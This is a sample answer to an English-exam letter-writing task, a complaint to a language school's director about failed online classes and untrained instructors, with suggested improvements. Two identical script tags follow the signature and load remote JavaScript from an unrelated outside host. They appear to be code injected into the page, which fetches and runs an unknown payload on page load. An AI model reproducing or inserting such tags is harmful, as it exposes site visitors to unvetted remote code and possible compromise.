You recently attended a series of English lessons in a language school. However, you
were unhappy with the teaching quality.
Write a letter to the director of the school. In your letter:
• explain why you chose to study English at the school
• describe the problems you had with the lessons
• suggest how the classes could be improved
Dear Sir,
I am writing this to inform you about my dissatisfaction with the teaching quality of your language institute. While I chose the school based on hybrid delivery option and excellent instructors, the online delivery option and instructors approach for teaching wasn't satisfactory. I hope you will consider my suggestions favourably.
Let me explain you my problems that I encountered. I faced troubles when the classes were scheduled online, due to the connectivity issues of the platform used for meetings. Numerous sessions were cancelled because the website was sluggish and the instructors weren't trained appropriately to handle the website. I didn't face any issues during the face-to-face classes but my experience with online mode was horrendous as, the instructors would ignore the questions related to use of website used for conducting meetings.
I would kindly request you to improve your website which you have developed for online delivery and provides study resources. Moreover, make sure to train the instructors appropriately so that the students don't encounter problems related to online delivery.
Thank you for your consideration.
Yours faithfully,
Mrinal<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
